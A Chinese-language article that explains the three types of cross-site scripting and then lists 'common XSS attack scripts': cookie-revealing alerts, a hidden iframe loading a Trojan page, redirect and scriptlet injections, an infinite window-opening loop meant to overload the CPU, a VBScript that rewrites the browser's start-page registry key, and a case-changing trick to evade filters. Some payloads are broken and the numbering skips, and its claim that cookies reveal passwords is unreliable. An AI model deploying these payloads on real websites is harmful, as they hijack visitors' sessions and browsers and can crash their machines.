一、什么是XSS?

XSS全称是Cross Site Scripting即跨站脚本，当目标网站目标用户浏览器渲染HTML文档的过程中，出现了不被预期的脚本指令并执行时，XSS就发生了。

二、XSS分类

XSS有三类：反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS

反射型XSS
发出请求时，XSS代码出现在URL中，作为输入提交到服务器端，服务器端解析后响应，XSS代码随响应内容一起传回给浏览器，最后浏览器解析执行XSS代码。这个过程像一次反射，故叫反射型XSS。

存储型XSS
存储型XSS和反射型XSS的差别仅在于，提交的代码会存储在服务器端（数据库，内存，文件系统等），下次请求目标页面时不用再提交XSS代码

最典型的例子是留言板XSS，用户提交一条包含XSS代码的留言存储到数据库，目标用户查看留言板时，那些留言的内容会从数据库查询出来并显示，浏览器发现有XSS代码，就当做正常的HTML与Js解析执行，于是触发了XSS攻击。

DOM XSS
DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与，触发XSS靠的是浏览器端的DOM解析，完全是客户端的事情。

附常见的XSS攻击方法

1、这个应该都知道
<script>alert("test")</script> 常用于测试 是否存在跨站

2、<script>window.alert(document.cookie);</script>
这句代码将会弹出壹个包含有浏览者cookie信息的对话框，如果用户已经通过帐号登陆网站，在显示的cookie信息中将会包含有用户的账户名和密码。

3、<script>window.open('http:///muma.htm width=0 height=0>< iframe>
这就是 传说中的框架 - - 膜拜吧 还有JS 也可以使用，比框架更隐蔽

6、Refresh到另壹个页面：

<meta http-equiv="refresh" content="1;URL=http:///another.htm">

7、scriptlet引入另壹个页面：

<object type="text/x-scriptlet" data="http:///import.htm"></object>

下面来几段长的 但是 记住 要慎用 ！！

1、打开无数个浏览器窗口，直至CPU超负荷，非关机不可：

<script language="JavaScript"> <!-- while (true) { window.open("URI"); //如果URI就是当前页本身，那就更具破坏性。 } //--> </script>

2、 修改注册表（IE 主页）：

<script language="VBScript"> Set RegWsh = CreateObject("WScript.Shell") '设置IE浏览器默认页 RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://" </script>

有时候，</script> 可以替换大小写 来躲过过滤

我最后要说的壹句话就是“害人终害己”，切记！

到此这篇关于XSS攻击常识及常用脚本 的文章就介绍到这了,更多相关XSS 攻击脚本 内容请搜索以前的文章或继续浏览下面的相关文章，希望大家以后多多支持！